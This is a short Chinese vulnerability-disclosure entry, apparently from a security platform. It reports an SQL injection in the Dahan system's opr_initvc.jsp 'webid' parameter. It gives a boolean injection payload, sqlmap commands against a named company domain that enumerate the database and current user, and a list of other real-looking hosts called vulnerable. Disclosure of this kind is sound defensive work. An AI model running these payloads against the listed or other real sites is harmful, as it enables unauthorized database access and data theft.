大汉系统又一SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 大汉系统又一SQL注入 ### 详细说明: Url: /vc/vc/para/opr_initvc.jsp?webid=1+and+1=1-- 截图: ./sqlmap.py -u 'http://www.sinotrans.com/vc/vc/para/opr_initvc.jsp?webid=1' --dbms Oracle [<img src="https://images.seebug.org/upload/201412/231415366179ccd92df816d915b97038b74992c3.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/231415366179ccd92df816d915b97038b74992c3.png) ./sqlmap.py -u 'http://www.sinotrans.com/vc/vc/para/opr_initvc.jsp?webid=1' --current-user [<img src="https://images.seebug.org/upload/201412/23141556b2d9e7b9308caf657d654347505c8ca0.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/23141556b2d9e7b9308caf657d654347505c8ca0.png) ### 漏洞证明: 案例: ``` http://222.186.88.83/vc/vc/para/opr_initvc.jsp?webid=1+and+1=1-- http://www.njhdgcj.com/vc/vc/para/opr_initvc.jsp?webid=a http://sstr.cscec.com/vc/vc/para/opr_initvc.jsp?webid=a...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息